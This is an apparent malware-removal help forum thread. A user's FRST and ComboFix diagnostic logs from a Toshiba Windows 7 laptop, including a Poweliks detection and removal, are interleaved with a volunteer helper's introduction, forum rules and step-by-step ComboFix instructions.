HomeGroupUser$ (S-1-5-21-616022151-183045692-1389677156-1009 - Limited - Enabled)
UpdatusUser (S-1-5-21-616022151-183045692-1389677156-1011 - Limited - Enabled) => C:\Users\UpdatusUser.Heathman-PC

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/28/2014 10:38:16 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:25:21 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 09:21:19 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 09:05:23 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:04:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/28/2014 09:00:00 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/28/2014 10:04:04 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 09:21:40 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (10/28/2014 09:21:34 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {078AEF33-C48A-49F7-AFF3-A0EE810BFE7C}

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )
Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )
Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:04:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/28/2014 08:58:46 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 08:55:50 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )
Description: 0x800700b7

Microsoft Office Sessions:
=========================
Error: (10/28/2014 10:38:16 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:25:21 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (10/28/2014 10:03:37 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (10/28/2014 09:21:19 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

Error: (10/28/2014 09:11:13 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000

Error: (10/28/2014 09:05:23 PM) (Source: Toshiba App Place) (EventID: 0) (User: )
Description: System.ArgumentOutOfRangeException: Number must be either non-negative and less than or equal to Int32.MaxValue or -1.
Parameter name: dueTime
Stack Trace:
   at System.Threading.Timer..ctor(TimerCallback callback, Object state, Int32 dueTime, Int32 period)
   at System.Timers.Timer.set_Enabled(Boolean value)
   at SnappCloud.ActivationReminder.AraClient.PostInit()
   at SnappCloud.ActivationReminder.Program.Main(String[] args)

Error: (10/28/2014 09:04:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/28/2014 09:00:00 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000

CodeIntegrity Errors:
===================================
  Date: 2014-06-15 16:45:26.328
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:42.065
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:41.124
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:41.064
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.733
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.674
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.554
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.494
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.402
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

  Date: 2014-06-15 16:44:40.338
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core i5-2450M CPU @ 2.50GHz
Percentage of memory in use: 33%
Total physical RAM: 8098.69 MB
Available physical RAM: 5395.79 MB
Total Pagefile: 16195.55 MB
Available Pagefile: 12958.59 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (TI106332W0C) (Fixed) (Total:449.23 GB) (Free:296.36 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 469CBCD6)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=449.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=15.1 GB) - (Type=17)

==================== End Of Log ============================

 

Thank you.

[Naathim]

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat

Before we start please note the following:

• Analysis and research take some time, also sometimes real life gets in the way, please be patient.
• Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
• Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
• Paste the logs in your posts, attachments make my work harder and more complicated.
• Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
• Note that we may live in totally different time zones, what may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight!

Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.

---

Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

• Right-click on icon and select Run as Administrator to start the tool.
• Accept the disclaimer and agree if prompted to install Recovery Console.
• Do not take any actions while ComboFix goes through your System - it may cause it to stall!
• This scan may take some time!
• When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

If you'll encounter any issues with internet connection after running ComboFix, please visit this link.

If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!

[adh]

Here is the Combo fix file

ComboFix 14-10-29.01 - ADH 10/29/2014 7:12.1.4 - x64

Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.8099.3113 [GMT -5:00]

Running from: c:\users\ADH.Heathman-PC\Desktop\ComboFix.exe

AV: Norton 360 Premier Edition *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}

FW: Norton 360 Premier Edition *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}

SP: Norton 360 Premier Edition *Disabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}

SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

* Created a new restore point

.

.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))

.

.

c:\programdata\Microsoft\Windows\DRM\88EB.tmp

c:\programdata\Roaming

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{09C41CEA-0C2F-42B1-B987-476BADCA5F4D}.xps

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{6C741E0A-07BC-41BF-BF75-DC89E12273E1}.xps

c:\users\ADH.Heathman-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files\{D512F409-6980-47F2-A546-34D92FD2ACBE}.xps

c:\windows\msdownld.tmp

.

.

CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.

You should verify if current CLSID data is correct:

.

HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

(Default) REG_SZ Thumbnail Cache Class Factory for Out of Proc Server

AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

.

HKEY_CLASSES_ROOT\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32

(Default) REG_SZ c:\windows\system32\thumbcache.dll

ThreadingModel REG_SZ Apartment

.

.

((((((((((((((((((((((((( Files Created from 2014-09-28 to 2014-10-29 )))))))))))))))))))))))))))))))

.

.

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\UpdatusUser.Heathman-PC\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Default\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\UpdatusUser\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Heathman\AppData\Local\temp

2014-10-29 12:24 . 2014-10-29 12:24 -------- d-----w- c:\users\Guest\AppData\Local\temp

2014-10-29 03:04 . 2014-10-29 03:55 -------- d-----w- C:\FRST

2014-10-24 23:49 . 2014-10-29 02:21 -------- d--h--w- c:\programdata\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

2014-10-21 15:22 . 2014-10-21 15:22 -------- d-----w- c:\users\ADH.Heathman-PC\AppData\Local\Diagnostics

2014-10-20 17:22 . 2014-09-05 02:11 6584320 ----a-w- c:\windows\system32\mstscax.dll

2014-10-20 17:22 . 2014-09-05 01:52 5703168 ----a-w- c:\windows\SysWow64\mstscax.dll

2014-10-19 21:19 . 2014-10-19 21:19 -------- d-----w- c:\program files (x86)\Common Files\Symantec Shared

2014-10-19 21:00 . 2014-10-19 21:00 177752 ----a-w- c:\windows\system32\drivers\SYMEVENT64x86.SYS

2014-10-19 21:00 . 2014-10-19 21:00 -------- d-----w- c:\program files (x86)\Norton 360

2014-10-19 20:49 . 2014-09-25 02:08 371712 ----a-w- c:\windows\system32\qdvd.dll

2014-10-19 20:49 . 2014-09-25 01:40 519680 ----a-w- c:\windows\SysWow64\qdvd.dll

2014-10-19 20:45 . 2014-09-13 01:58 77312 ----a-w- c:\windows\system32\packager.dll

2014-10-04 13:18 . 2014-10-19 21:04 -------- d-----w- c:\windows\system32\drivers\N360x64\1506000.020

.

.

.

(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2014-10-29 11:15 . 2014-05-18 01:38 129752 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys

2014-10-19 21:44 . 2012-03-29 00:04 103265616 ----a-w- c:\windows\system32\MRT.exe

2014-10-01 16:11 . 2014-05-17 22:12 63704 ----a-w- c:\windows\system32\drivers\mwac.sys

2014-10-01 16:11 . 2014-05-17 22:12 93400 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys

2014-10-01 16:11 . 2013-07-29 22:47 25816 ----a-w- c:\windows\system32\drivers\mbam.sys

2014-09-24 01:24 . 2012-04-02 01:34 701104 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe

2014-09-24 01:24 . 2011-11-22 04:31 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl

2014-09-09 22:11 . 2014-09-23 17:27 2048 ----a-w- c:\windows\system32\tzres.dll

2014-09-09 21:47 . 2014-09-23 17:27 2048 ----a-w- c:\windows\SysWow64\tzres.dll

2014-08-28 23:29 . 2011-03-29 02:36 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll

2014-08-23 02:07 . 2014-08-27 17:37 404480 ----a-w- c:\windows\system32\gdi32.dll

2014-08-23 01:45 . 2014-08-27 17:37 311808 ----a-w- c:\windows\SysWow64\gdi32.dll

2014-08-01 11:53 . 2014-09-10 11:46 1031168 ----a-w- c:\windows\system32\TSWorkspace.dll

2014-08-01 11:35 . 2014-09-10 11:46 793600 ----a-w- c:\windows\SysWow64\TSWorkspace.dll

.

.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))

.

.

*Note* empty entries & legit default entries are not shown

REGEDIT4

.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"swg"="c:\program files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2012-03-24 39408]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]

"SVPWUTIL"="c:\program files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe" [2010-11-09 532480]

"HWSetup"="c:\program files\TOSHIBA\Utilities\HWSetup.exe" [2011-03-10 423936]

"KeNotify"="c:\program files (x86)\TOSHIBA\Utilities\KeNotify.exe" [2010-08-16 34160]

"ToshibaServiceStation"="c:\program files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" [2011-07-12 1298816]

"ToshibaAppPlace"="c:\program files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe" [2010-09-23 552960]

"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2014-08-21 959176]

"Samsung PanelMgr"="c:\windows\Samsung\PanelMgr\ssmmgr.exe" [2009-12-09 606208]

"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]

"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-08-01 152392]

.

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]

"ConsentPromptBehaviorAdmin"= 5 (0x5)

"ConsentPromptBehaviorUser"= 3 (0x3)

"EnableUIADesktopToggle"= 0 (0x0)

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]

"LoadAppInit_DLLs"=1 (0x1)

"AppInit_DLLs"=c:\windows\SysWOW64\nvinit.dll

.

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]

"mixer3"=wdmaud.drv

.

R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]

R3 BTCFilterService;USB Networking Driver Filter Service;c:\windows\system32\DRIVERS\motfilt.sys;c:\windows\SYSNATIVE\DRIVERS\motfilt.sys [x]

R3 GamesAppService;GamesAppService;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe [x]

R3 intaud_WaveExtensible;Intel WiDi Audio Device;c:\windows\system32\drivers\intelaud.sys;c:\windows\SYSNATIVE\drivers\intelaud.sys [x]

R3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]

R3 motccgp;Motorola USB Composite Device Driver;c:\windows\system32\DRIVERS\motccgp.sys;c:\windows\SYSNATIVE\DRIVERS\motccgp.sys [x]

R3 motccgpfl;MotCcgpFlService;c:\windows\system32\DRIVERS\motccgpfl.sys;c:\windows\SYSNATIVE\DRIVERS\motccgpfl.sys [x]

R3 Motousbnet;Motorola USB Networking Driver Service;c:\windows\system32\DRIVERS\Motousbnet.sys;c:\windows\SYSNATIVE\DRIVERS\Motousbnet.sys [x]

R3 motusbdevice;Motorola USB Dev Driver;c:\windows\system32\DRIVERS\motusbdevice.sys;c:\windows\SYSNATIVE\DRIVERS\motusbdevice.sys [x]

R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [x]

R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]

R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]

R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]

R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]

R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]

R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]

S0 nvpciflt;nvpciflt;c:\windows\system32\DRIVERS\nvpciflt.sys;c:\windows\SYSNATIVE\DRIVERS\nvpciflt.sys [x]

S0 SymDS;Symantec Data Store;c:\windows\system32\drivers\N360x64\1506000.020\SYMDS64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMDS64.SYS [x]

S0 SymEFA;Symantec Extended File Attributes;c:\windows\system32\drivers\N360x64\1506000.020\SYMEFA64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMEFA64.SYS [x]

S0 Thpdrv;TOSHIBA HDD Protection Driver;c:\windows\system32\DRIVERS\thpdrv.sys;c:\windows\SYSNATIVE\DRIVERS\thpdrv.sys [x]

S0 Thpevm;TOSHIBA HDD Protection - Shock Sensor Driver;c:\windows\system32\DRIVERS\Thpevm.SYS;c:\windows\SYSNATIVE\DRIVERS\Thpevm.SYS [x]

S0 tos_sps64;TOSHIBA tos_sps64 Service;c:\windows\system32\DRIVERS\tos_sps64.sys;c:\windows\SYSNATIVE\DRIVERS\tos_sps64.sys [x]

S1 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\BASHDefs\20141024.001\BHDrvx64.sys [x]

S1 ccSet_N360;N360 Settings Manager;c:\windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\ccSetx64.sys [x]

S1 IDSVia64;IDSVia64;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys;c:\program files (x86)\Norton 360\NortonData\21.6.0.32\Definitions\IPSDefs\20141028.001\IDSvia64.sys [x]

S1 SymIRON;Symantec Iron Driver;c:\windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\Ironx64.SYS [x]

S1 SymNetS;Symantec Network Security WFP Driver;c:\windows\system32\drivers\N360x64\1506000.020\SYMNETS.SYS;c:\windows\SYSNATIVE\drivers\N360x64\1506000.020\SYMNETS.SYS [x]

S2 DeviceMonitorService;DeviceMonitorService;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe;c:\program files (x86)\Motorola Media Link\Lite\NServiceEntry.exe [x]

S2 IntuitUpdateServiceV4;Intuit Update Service v4;c:\program files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe;c:\program files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [x]

S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]

S2 Motorola Device Manager;Motorola Device Manager Service;c:\program files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe;c:\program files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [x]

S2 N360;Norton 360;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe;c:\program files (x86)\Norton 360\Engine\21.6.0.32\N360.exe [x]

S2 Norton PC Checkup Application Launcher;Norton PC Checkup Application Launcher;c:\program files (x86)\PC Checkup\SymcPCCULaunchSvc.exe;c:\program files (x86)\PC Checkup\SymcPCCULaunchSvc.exe [x]

S2 PCCUJobMgr;Common Client Job Manager Service;c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe;c:\program files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe [x]

S2 PST Service;PST Service;c:\program files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe;c:\program files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [x]

S2 SSPORT;SSPORT;c:\windows\system32\Drivers\SSPORT.sys;c:\windows\SYSNATIVE\Drivers\SSPORT.sys [x]

S2 TomTomHOMEService;TomTomHOMEService;c:\program files (x86)\TomTom HOME 2\TomTomHOMEService.exe;c:\program files (x86)\TomTom HOME 2\TomTomHOMEService.exe [x]

S2 TOSHIBA eco Utility Service;TOSHIBA eco Utility Service;c:\program files\TOSHIBA\TECO\TecoService.exe;c:\program files\TOSHIBA\TECO\TecoService.exe [x]

S2 TVALZFL;TOSHIBA ACPI-Based Value Added Logical and General Purpose Device Filter Driver;c:\windows\system32\DRIVERS\TVALZFL.sys;c:\windows\SYSNATIVE\DRIVERS\TVALZFL.sys [x]

S2 UDSS;UDSS;c:\program files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe;c:\program files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe [x]

S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [x]

S3 CeKbFilter;CeKbFilter;c:\windows\system32\DRIVERS\CeKbFilter.sys;c:\windows\SYSNATIVE\DRIVERS\CeKbFilter.sys [x]

S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]

S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]

S3 iwdbus;IWD Bus Enumerator;c:\windows\system32\DRIVERS\iwdbus.sys;c:\windows\SYSNATIVE\DRIVERS\iwdbus.sys [x]

S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]

S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]

S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]

